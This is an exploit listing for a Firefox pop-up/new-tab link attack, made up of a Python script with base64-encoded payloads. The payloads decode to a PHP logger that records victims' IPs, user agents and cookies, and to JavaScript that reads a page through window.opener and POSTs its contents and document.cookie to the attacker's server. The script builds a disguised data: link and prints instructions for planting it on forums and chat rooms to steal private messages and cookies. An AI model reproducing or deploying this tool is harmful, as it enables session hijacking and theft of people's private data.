Mozilla Firefox Pop-up/New_tab Link Based Information Leaking Attack Exploit

2017.03.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#save as a Python file and run from terminal import base64 import io import platform import os happyman1=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4uDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLCwsICAgICAgICAgICAgICAgICAgICAgICAgIE1NIC5NDQogICAgICAgICAgICAgICAgICAgICAgICAgICAsIU1NTU1NTU0hLCAgICAgICAgICAgICAgICAgICAgIE1NIE1NICAsLg0KICAgLiwgLk0gICAgICAgICAgICAgICAgLk1NTU1NTU1NTU1NTU1NTU0uLCAgICAgICAgICAnTU0uICBNTSBNTSAuTScNCiAuIE06IE07ICBNICAgICAgICAgIC5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NLCAgICAgICAgICAnTU0sOk0gTSchTScNCjtNIE1NIE06IC5NICAgICAgICAuTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU0sICAgICAgICAgJ01NJy4uLidNDQogTTtNTTtNIDpNTSAgICAgIC5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU0uICAgICAgIC5NTU1NTU1NTQ0KICdNO00nTSBNTSAgICAgIE1NTU1NTSAgTU1NTU1NTU1NTU1NTU1NTU0gIE1NTU1NTS4gICAgLCxNLk0uJ01NTScNCiAgTU0nTU1NTSAgICAgIE1NTU1NTSBAQCBNTU1NTU1NTU1NTU1NTU0gQEAgTU1NTU1NTS4nTScnTU1NTTtNTScNCiBNTS4sICxNTSAgICAgTU1NTU1NTU0gIE1NTU1NTU1NTU1NTU1NTU1NICBNTU1NTU1NTU0gICAgICAnLk1NTQ0KICdNTTtNTU1NTU1NTS5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTS4gICAgICAnTU1NDQogICcnLidNTU0nICAuTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTSAgICAgICBNTU1NDQogICBNTUMgICAgICBNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTS4gICAgICAnTU1NTQ0KICAuTU0gICAgICA6TU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTScnTU1NICAgICAgIE1NTU1NDQogIE1NTSAgICAgIDpNICAnTU1NTU1NTU1NTU1NTS5NTU1NTS5NTU1NTU1NTU1NJy5NTSAgTU06TS4gICAgJ01NTU1NDQogLk1NTSAgIC4uLjpNOiA6TS4nTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTScuTScnICAgTU06TU1NTU1NTU1NTU1NJw0KQU1NTS4uTU1NTU06TS4gICAgOk0uJ01NTU1NTU1NTU1NTU1NTU1NTU1NJy5NTScgICAgIE1NJycnJycnJycnJycnDQpNTU1NTU1NTU1NTTpNTSAgICAgJ00nLk0nTU1NTU1NTU1NTU1NTU0nLk1DJ00nICAgICAuTU0NCiAnJycnJycnJycnOk1NLiAgICAgICAnTU0hTS4nTS1NLU0tTSdNLidNTScgICAgICAgIE1NTQ0KICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICdNTU1NIU1NTU0nICAgICAgICAgICAgLk1NDQogICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICAnJycgICAnJyAgICAgICAgICAgIC5NTScNCiAgICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICAgICAgICAgICAgI
CAgICAgICBNTU0nDQogICAgICAgICAgICAgICBNTU1NICAgICAgICAgICAgLC5KLkpKSkouICAgICAgIC5NTU0nDQogICAgICAgICAgICAgICAgTU1NTS4gICAgICAgJ0pKSkpKSkonSkpKTSAgIENNTU1NTQ0KICAgICAgICAgICAgICAgICAgTU1NTU0uICAgICdKSkpKSkpKSidKSkogLk1NTU1NJw0KICAgICAgICAgICAgICAgICAgICBNTU1NTU1NTS4nICAnSkpKSkonSkpNTU1NTScNCiAgICAgICAgICAgICAgICAgICAgICAnTU1NTU1NTU1NJ0pKSkpKIEpKSkpKJw0KICAgICAgICAgICAgICAgICAgICAgICAgICcnTU1NTU1NSkpKSkpKSkpKSicNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdKSkpKSkpKSic=") happyman2=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgKioqICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAgICAgICoqKioqICAgICAgICAgICAgICAgICoqKioqDQogICAgICAgICAgICAgICAgICAgICoqKioqICAgICAgICAgICAgICAgICoqKioqDQogICAgICAgICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICoqKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAgICAgKioqICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAgICAgICAgKioqKioqKioqKioqKioqKioqKioqKg0KICAgICAgICAgICAgICAgICAgICAgICAgICoqKioqKioqKioqKioqKio=") 
sadman=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLg0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4uDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuLg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLiAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICBfX19gLlwuLy8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLS0tLi0tLQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgLyAgICAgXC4tLQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAvICAgICAgIFwtDQogICAgICAgICAgICAgICAgICAgICAgICAgfCAgIC9cICAgIFwNCiAgICAgICAgICAgICAgICAgICAgICAgICB8XD09L1w9PS8gIHwNCiAgICAgICAgICAgICAgICAgICAgICAgICB8IGBAJ2BAJyAgLi0tLg0KICAgICAgICAgICAgICAgICAgLi0tLS0tLS0tLiAgICAgICAgICAgKQ0KICAgICAgICAgICAgICAgIC4nICAgICAgICAgICAgIC4gICBgLl8vDQogICAgICAgICAgICAgICAvICAgICAgICAgICAgICAgfCAgICAgXA0KICAgICAgICAgICAgICAuICAgICAgICAgICAgICAgLyAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgICAgICAgIC8gICAgICAgIHwNCiAgICAgICAgICAgICAgfCAgICAgICAgICAgIC4nICAgICAgICAgfCAgIC4tLS4NCiAgICAgICAgICAgICAuJ2AuICAgICAgICAuJ18gICAgICAgICAgfCAgLyAgICBcDQogICAgICAgICAgIC4nICAgIGAuX18uLS0nLi0tYC4gICAgICAgLyAuJyAgICAgIHwNCiAgICAgICAgIC4nICAgICAgICAgICAgLnwgICAgXFwgICAgIHxfLyAgICAgICAgfA0KICAgICAgIC4nICAgICAgICAgICAgLicgfCAgICAgXFwgICAgICAgICAgICAgICB8DQogICAgIC4tYC4gICAgICAgICAgIC8gICB8ICAgICAgLiAgICAgIF9fICAgICAgIHwNCiAgIC4nICAgIGAuICAgICBcICAgfCAgIGAgICAgICAgICAgIC4nICApICAgICAgXA0KICAvICAgICAgICBcICAgLyBcICB8ICAgICAgICAgICAgLi0nICAgLyAgICAgICB8DQogKCAgLyAgICAgICBcIC8gICBcIHwgICAgICAgICAgICAgICAgIHwgICAgICAgIHwNCiAgXC8gICAgICAgICAoICAgICBcLyAgICAgICAgICAgICAgICAgfCAgICAgICAgfA0KICAoICAvICAgICAgICApICAgIC8gICAgICAgICAgICAgICAgIC8gICBfLi0tLS18DQogICBcLyAgIC8vICAgLyAgIC4nICAgICAgICAgICAgICAgICAgfC4tJyAgICAgICBgDQogICAoICAgLyggICAvICAgLyAgICAgICAgICAgICAgICAgICAgLyAgICAgIGAuICAgfA0KICAgIGAuKCAgYC0nKSAgLi0tLS4gICAgICAgICAgICAgICAgfCAgICBgLiAgIGAuXy8NCiAgICAgICB
gLl8uJyAgLyAgICAgYC4gICAuLS0tLiAgICAgIHwgIC4gICBgLl8uJw0KICAgICAgICAgICAgICB8ICAgICAgIFwgLyAgICAgYC4gICAgIFwgIGAuX19fLicNCiAgICAgICAgICAgICAgfCAgICAgICAgWSAgICAgICAgYC4gICAgYC5fX18uJw0KICAgICAgICAgICAgICB8ICAgICAgLiB8ICAgICAgICAgIFwgICAgICAgICBcDQogICAgICAgICAgICAgIHwgICAgICAgYHwgICAgICAgICAgIFwgICAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgIHwgICAgICAgLiAgICBcICAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgIHwgICAgICAgIFwgICAgXCAgICAgICB8DQogICAgICAgICAgICAuLS0uICAgICAgIHwgICAgICAgICBcICAgICAgICAgICB8DQogICAgICAgICAgIC8gICAgYC4gIC4tLS0tLiAgICAgICAgXCAgICAgICAgICAvDQogICAgICAgICAgLyAgICAgICBcLyAgICAgIFwgICAgICAgIFwgICAgICAgIC8NCiAgICAgICAgICB8ICAgICAgIHwgICAgICAgIFwgICAgICAgfCAgICAgICAvDQogICAgICAgICAgIFwgICAgICB8ICAgIEAgICAgXCAgIGAtLiBcICAgICAvDQogICAgICAgICAgICBcICAgICAgXCAgICAgICAgIFwgICAgIFx8Ll9fLicNCiAgICAgICAgICAgICBcICAgICAgXCAgICAgICAgIFwgICAgIHwNCiAgICAgICAgICAgICAgXCAgICAgIFwgICAgICAgICBcICAgIHwNCiAgICAgICAgICAgICAgIFwgICAgICBcICAgICAgICAgXCAgIHwNCiAgICAgICAgICAgICAgICBcICAgIC4nYC4gICAgICAgIFwgIHwNCiAgICAgICAgICAgICAgICAgYC4tJyAgICBgLiAgICBfLidcIHwNCiAgICAgICAgICAgICAgICAgICB8ICAgICAgIGAuLScgICAgfHwNCiAgICAgICAgICAgICAgLiAgICAgXCAgICAgLiBgLiAgICAgfHwgICAgICAuJw0KICAgICAgICAgICAgICAgYC4gICAgYC0uLScgICAgYC5fXy4nICAgICAuJw0KICAgICAgICAgICAgICAgICBgLiAgICAgICAgICAgICAgICAgICAgLicNCiAgICAgICAgICAgICAuICAgICAgICAgICAgICAgICAgICAgICAuJw0KICAgICAgICAgICAgICBgLg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4tJw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4tJw0KDQogICAgICBcICAgICAgICAgICAgICAgICBcDQogICAgICAgXCAgICAgICAgIC4uICAgICAgXA0KICAgICAgICBcICAgICAgIC8gIGAtLi0tLl9fXyBfXy4tLl9fXw0KYC0uICAgICAgXCAgICAgLyAgIyAgIGAtLl8uLScgICAgXCAgIGAtLS5fXw0KICAgYC0uICAgICAgICAvICAjIyMjICAgIC8gICAjIyMgIFwgICAgICAgIGAuDQpfX19fX19fXyAgICAgLyAgIyMjIyAjIyMjIyMjIyMjIyMgIHwgICAgICAgX3wgICAgICAgICAgIC4nDQogICAgICAgICAgICB8XCAjIyMjICMjIyMjIyMjIyMjIyMjICBcX18uLS0nIHwgICAgLyAgICAuJw0KICAgICAgICAgICAgfCAjIyMjIyMjIyMjIyMjIyMjIyMjIyAgfCAgICAgICB8ICAgLyAgIC4nDQogICAgICAgICA
gICB8ICMjIyMgIyMjIyMjIyMjIyMjIyMjICB8ICAgICAgIHwgIC8NCiAgICAgICAgICAgIHwgIyMjIyAjIyMjIyMjIyMjIyMjIyMgIHwgICAgICAvfCAgICAgIC0tLS0NCiAgICAgICAgICAuIHwgIyMjIyAjIyMjIyMjIyMjIyMjIyMgIHwgICAgLic8ICAgIF9fX18NCiAgICAgICAgLicgIHwgIyMjIyMjIyMjIyMjIyMjIyMjIyMgIHwgXy4nLSdcfA0KICAgICAgLicgICAgfCAgICMjIyMjIyMjIyMjIyMjIyMjIyAgfCAgICAgICB8DQogICAgICAgICAgICAgYC4gICAjIyMjIyMjIyMjIyMjIyMjICB8ICAgICAgIHwNCiAgICAgICAgICAgICAgIGAuICAgICMjIyMjIyMjIyMjIyAgIHwgICAgICAgfCAtLS0tDQogICAgICAgICAgICAgIF9fX2AuICAgICAjIyMjIyAgICAgXy4uX19fXy4tJyAgICAgLg0KICAgICAgICAgICAgIHxgLS5fIGAtLl8gICAgICAgXy4tJyAgICBcXFwgICAgICAgICBgLg0KICAgICAgICAgIC4nYC0uXyAgYC0uXyBgLS5fLi0nYC0tLl9fXy4tJyBcICAgICAgICAgIGAuDQogICAgICAgIC4nIC4uIC4gYC0uXyAgYC0uXyAgICAgICAgX19fLi0tLSd8ICAgXCAgIFwNCiAgICAgIC4nIC4uIC4gLi4gLiAgYC0uXyAgYC0uX18uLScgICAgICAgIHwgICAgXCAgIFwNCiAgICAgfGAtLiAuIC4uICAuIC4uIC4gIGAtLl98ICAgICAgICAgICAgIHwgICAgIFwgICBcDQogICAgIHwgICBgLS5fIC4gLi4gIC4gLi4gICAuJyAgICAgICAgICAgIF98DQogICAgICBgLS5fICAgYC0uXyAuIC4uICAgLicgfCAgICAgIF9fLi0tJw0KICAgICAgICAgIGAtLl8gICBgLS5fICAuJyAuJ3xfXy4tLScNCiAgICAgICAgICAgICAgYC0uXyAgIGAnIC4nDQogICAgICAgICAgICAgICAgICBgLS5fLic=") base64Exploit 
="""PD9waHANCiRkYXRhPXN0cl9yZXBsYWNlKCIgIiwiKyIsJF9QT1NUWydkYXRhJ10pOw0KJGNvb2tpZXM9JF9QT1NUWydjb29raWVzJ107DQokaW5mbz0nPGh0bWw+PGJvZHk+PGZvbnQgY29sb3I9ImJsdWUiIHNpemU9IjUiPkxlYWtlZCBJbmZvcm1hdGlvbnM8L2ZvbnQ+PGJyPjxmb250IGNvbG9yPSJncmVlbiIgc2l6ZT0iMyI+VmljdGltIElQOicuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIjxicj48YnI+VmljdGltIFVTRVIgQUdFTlQ6Ii4kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10uIjxicj48YnI+Q29va2llczo8YnI+Ii4kY29va2llcy4iPC9mb250Pjxocj4iOw0KJGRhdGE9IjxodG1sPjxib2R5IG9ubG9hZD0iLiInIi4nDQp2YXIgQmFzZTY0PXtfa2V5U3RyOiJBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvPSIsZW5jb2RlOmZ1bmN0aW9uKGUpe3ZhciB0PSIiO3ZhciBuLHIsaSxzLG8sdSxhO3ZhciBmPTA7ZT1CYXNlNjQuX3V0ZjhfZW5jb2RlKGUpO3doaWxlKGY8ZS5sZW5ndGgpe249ZS5jaGFyQ29kZUF0KGYrKyk7cj1lLmNoYXJDb2RlQXQoZisrKTtpPWUuY2hhckNvZGVBdChmKyspO3M9bj4+MjtvPShuJjMpPDw0fHI+PjQ7dT0ociYxNSk8PDJ8aT4+NjthPWkmNjM7aWYoaXNOYU4ocikpe3U9YT02NH1lbHNlIGlmKGlzTmFOKGkpKXthPTY0fXQ9dCt0aGlzLl9rZXlTdHIuY2hhckF0KHMpK3RoaXMuX2tleVN0ci5jaGFyQXQobykrdGhpcy5fa2V5U3RyLmNoYXJBdCh1KSt0aGlzLl9rZXlTdHIuY2hhckF0KGEpfXJldHVybiB0fSxkZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpO3ZhciBzLG8sdSxhO3ZhciBmPTA7ZT1lLnJlcGxhY2UoL1teQS1aYS16MC05Ky89XS9nLCIiKTt3aGlsZShmPGUubGVuZ3RoKXtzPXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO289dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7dT10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTthPXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO249czw8MnxvPj40O3I9KG8mMTUpPDw0fHU+PjI7aT0odSYzKTw8NnxhO3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKG4pO2lmKHUhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShyKX1pZihhIT02NCl7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUoaSl9fXQ9QmFzZTY0Ll91dGY4X2RlY29kZSh0KTtyZXR1cm4gdH0sX3V0ZjhfZW5jb2RlOmZ1bmN0aW9uKGUpe2U9ZS5yZXBsYWNlKC9ybi9nLCJuIik7dmFyIHQ9IiI7Zm9yKHZhciBuPTA7bjxlLmxlbmd0aDtuKyspe3ZhciByPWUuY2hhckNvZGVBdChuKTtpZihyPDEyOCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyKX1lbHNlIGlmKHI+MTI3JiZyPDIwNDgpe3QrPVN0cmluZy5mcm9tQ2hhckNvZGUocj4+NnwxOTIpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUociY2M3wxMjgpfWVsc2V7dCs9U3RyaW5nLmZyb21D
aGFyQ29kZShyPj4xMnwyMjQpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUocj4+NiY2M3wxMjgpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUociY2M3wxMjgpfX1yZXR1cm4gdH0sX3V0ZjhfZGVjb2RlOmZ1bmN0aW9uKGUpe3ZhciB0PSIiO3ZhciBuPTA7dmFyIHI9YzE9YzI9MDt3aGlsZShuPGUubGVuZ3RoKXtyPWUuY2hhckNvZGVBdChuKTtpZihyPDEyOCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyKTtuKyt9ZWxzZSBpZihyPjE5MSYmcjwyMjQpe2MyPWUuY2hhckNvZGVBdChuKzEpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUoKHImMzEpPDw2fGMyJjYzKTtuKz0yfWVsc2V7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7YzM9ZS5jaGFyQ29kZUF0KG4rMik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYxNSk8PDEyfChjMiY2Myk8PDZ8YzMmNjMpO24rPTN9fXJldHVybiB0fX0NCmRvY3VtZW50LmJvZHkuaW5uZXJIVE1MPWF0b2IoIicuYmFzZTY0X2VuY29kZSgkaW5mbykuJyIpOw0KZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrPUJhc2U2NC5kZWNvZGUoIicuJGRhdGEuJyIpOycuIic+Ii4NCic8L2JvZHk+PC9odG1sPic7DQpmdW5jdGlvbiBnZW5lcmF0ZVJhbmRvbVN0cmluZygpIHsNCiAgICAkY2hhcmFjdGVycyA9ICcwMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXonOw0KICAgICRjaGFyYWN0ZXJzTGVuZ3RoID0gc3RybGVuKCRjaGFyYWN0ZXJzKTsNCiAgICAkcmFuZG9tU3RyaW5nID0gJyc7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgNTsgJGkrKykgew0KICAgICAgICAkcmFuZG9tU3RyaW5nIC49ICRjaGFyYWN0ZXJzW3JhbmQoMCwgJGNoYXJhY3RlcnNMZW5ndGggLSAxKV07DQogICAgfQ0KICAgIHJldHVybiAkcmFuZG9tU3RyaW5nOw0KfQ0KZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIl8iLmdlbmVyYXRlUmFuZG9tU3RyaW5nKCkuIi5odG1sIiwgJGRhdGEgLCBGSUxFX0FQUEVORCB8IExPQ0tfRVgpOw0KPz4=""" def ColourMe(txt,colour): opsys = platform.system() if (opsys=="Linux"): from termcolor import colored return colored(txt,colour) else: return txt def PrepareLink(i1,i2,i3,i4): 
stealer=base64.b64decode("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIm1uaCIpLnJlbW92ZSgpO3ZhciBCYXNlNjQ9e19rZXlTdHI6IkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IixlbmNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpLHMsbyx1LGE7dmFyIGY9MDtlPUJhc2U2NC5fdXRmOF9lbmNvZGUoZSk7d2hpbGUoZjxlLmxlbmd0aCl7bj1lLmNoYXJDb2RlQXQoZisrKTtyPWUuY2hhckNvZGVBdChmKyspO2k9ZS5jaGFyQ29kZUF0KGYrKyk7cz1uPj4yO289KG4mMyk8PDR8cj4+NDt1PShyJjE1KTw8MnxpPj42O2E9aSY2MztpZihpc05hTihyKSl7dT1hPTY0fWVsc2UgaWYoaXNOYU4oaSkpe2E9NjR9dD10K3RoaXMuX2tleVN0ci5jaGFyQXQocykrdGhpcy5fa2V5U3RyLmNoYXJBdChvKSt0aGlzLl9rZXlTdHIuY2hhckF0KHUpK3RoaXMuX2tleVN0ci5jaGFyQXQoYSl9cmV0dXJuIHR9LGRlY29kZTpmdW5jdGlvbihlKXt2YXIgdD0iIjt2YXIgbixyLGk7dmFyIHMsbyx1LGE7dmFyIGY9MDtlPWUucmVwbGFjZSgvW15BLVphLXowLTkrLz1dL2csIiIpO3doaWxlKGY8ZS5sZW5ndGgpe3M9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bz10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTt1PXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO2E9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bj1zPDwyfG8+PjQ7cj0obyYxNSk8PDR8dT4+MjtpPSh1JjMpPDw2fGE7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUobik7aWYodSE9NjQpe3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWlmKGEhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShpKX19dD1CYXNlNjQuX3V0ZjhfZGVjb2RlKHQpO3JldHVybiB0fSxfdXRmOF9lbmNvZGU6ZnVuY3Rpb24oZSl7ZT1lLnJlcGxhY2UoL3JuL2csIm4iKTt2YXIgdD0iIjtmb3IodmFyIG49MDtuPGUubGVuZ3RoO24rKyl7dmFyIHI9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWVsc2UgaWYocj4xMjcmJnI8MjA0OCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42fDE5Mik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9ZWxzZXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHI+PjEyfDIyNCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42JjYzfDEyOCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9fXJldHVybiB0fSxfdXRmOF9kZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG49MDt2YXIgcj1jMT1jMj0wO3doaWxlKG48ZS5sZW5ndGgpe3I9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpO24rK31lbHNlIGlmKHI+MTkxJiZyPDIyNCl7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYzMSk8PD
Z8YzImNjMpO24rPTJ9ZWxzZXtjMj1lLmNoYXJDb2RlQXQobisxKTtjMz1lLmNoYXJDb2RlQXQobisyKTt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKChyJjE1KTw8MTJ8KGMyJjYzKTw8NnxjMyY2Myk7bis9M319cmV0dXJuIHR9fQ0KdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgew0KICAgIGlmICh4aHIucmVhZHlTdGF0ZSA9PSBYTUxIdHRwUmVxdWVzdC5ET05FKSB7DQp2YXIgeGhyMiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyMi5vcGVuKCJQT1NUIiwgIg==")+i1+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCnhocjIuc2VuZCgiZGF0YT0iK0Jhc2U2NC5lbmNvZGUoeGhyLnJlc3BvbnNlVGV4dCkrICImY29va2llcz0iK2RvY3VtZW50LmNvb2tpZSk7DQogICAgfQ0KfQ0KeGhyLm9wZW4oIkdFVCIsICI=")+i2+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIuc2VuZChudWxsKTs=") BadIMGTag="<img id='mnh' src='d:s' style='display: none;' onerror='"+stealer+"'>" HTMLCode="<html><body onload='window.opener.document.body.innerHTML+=atob("+'"'+base64.b64encode(BadIMGTag)+'"'+");document.location=atob("+'"'+base64.b64encode(i4)+'"'+");'>"+'</body></html>' print ColourMe("\n\n"+happyman1+"\n\n","green") print ColourMe('The malicious link is here:',"cyan") print '============================\n<a target="_blank" href="data:text/html;base64,'+base64.b64encode(HTMLCode)+'">'+i3+'</a>\n============================' print '\nInject this link to the page of forums,Websites,Chat-rooms,... that allows you to insert Pop-up/new_tab link tags.If a firefox user clicks on it,his cookies and sensitive informations will be saved on your web host(in the folder that you uploaded logger.php).Note:All Firefox-based browsers are vulnerable.This Exploit does not affect IE,Chrome.Other browsers such as Opera,Safari,...may be vulnerable.I don'+"'"+'t know.You should test it!\n\n\n'+'Injection methods:\n\n1-HTML Link tag injection:\nIf you can insert a link tag you should paste the copied link element to a page and submit it\n\n2-Injection by Link adder tools:\nSome forums,chat-rooms,... 
don'+"'t "+'allow you to insert html link tags.So you should create a link with the fallowing properties and submit it:\nLabel:'+i3+'\nAddress or href:data:text/html;base64,'+base64.b64encode(HTMLCode)+'\ntarget(must be pop up or new tab link):_blank'+'\n\nEnjoy and be a professional exploiter!Bye.\n'+base64.b64decode("KCAgX19fIFwgfFwgICAgIC98KCAgX19fXyBcKCApDQp8ICggICApICkoIFwgICAvICl8ICggICAgXC98IHwNCnwgKF9fLyAvICBcIChfKSAvIHwgKF9fICAgIHwgfA0KfCAgX18gKCAgICBcICAgLyAgfCAgX18pICAgfCB8DQp8ICggIFwgXCAgICApICggICB8ICggICAgICAoXykNCnwgKV9fXykgKSAgIHwgfCAgIHwgKF9fX18vXCBfIA0KfC8gXF9fXy8gICAgXF8vICAgKF9fX19fX18vKF8pDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=") def Exploit(): with io.FileIO(os.path.dirname(os.path.realpath(__file__))+"/logger.php", "w") as file: file.write(base64.b64decode(base64Exploit)) logger_link = raw_input("\nlogger.php file was created by this python script in the current folder.\nUpload it to your Web Server,Insert the HTTP address(URL) of file after uploading(for example:http://badhacker.com/folder/to/file/logger.php):") stolen_page = raw_input("\nInsert the URL of the page you want to steal it.You can steal private messages,personal informations,settings,...( this and the link container page MUST have the same origion)(for example:http://victimforum.com/privatemessages.php?page=1):") title = raw_input("\nInsert some text for label of the malicious link(for example:Click Me!):") fake_url = raw_input("\nInsert the URL of the page that victim will visit by your malicious link(for example:https://google.com):") print "\nHere is what you want:\nlogger.php file URL:"+logger_link+"\nPage you want to steal:"+stolen_page+"\nTitle of the malicious link:"+title+"\nFake URL of the malicious link:"+fake_url+"\n\n\n\n\n" correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) while(correct!="y"): if correct=="n": print ColourMe("Sorry.Restart the exploit and try 
again.\n"+sadman,"red") exit() else: correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) PrepareLink(logger_link,stolen_page,title,fake_url) banner="""####### # # # ##### # #### # ##### # # # # # # # # # # ##### ## # # # # # # # # ## ##### # # # # # # # # # # # # # # ####### # # # ###### #### # #""" terms="\n\nThis exploit is written for educational purposes only.We are NOT responsible for Illegal usages.Use it at your own risk.\n" info=""" ###################### # Exploit Title : Mozilla Firefox Pop-up/New_tab Link Based Informatin Leaking Attack Exploit # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://www.mozilla.org/en-US/ # Google Dork : N/A # Date: 13 Mar 2017 # Tested On : Kali linux 2 32bit_Mozilla 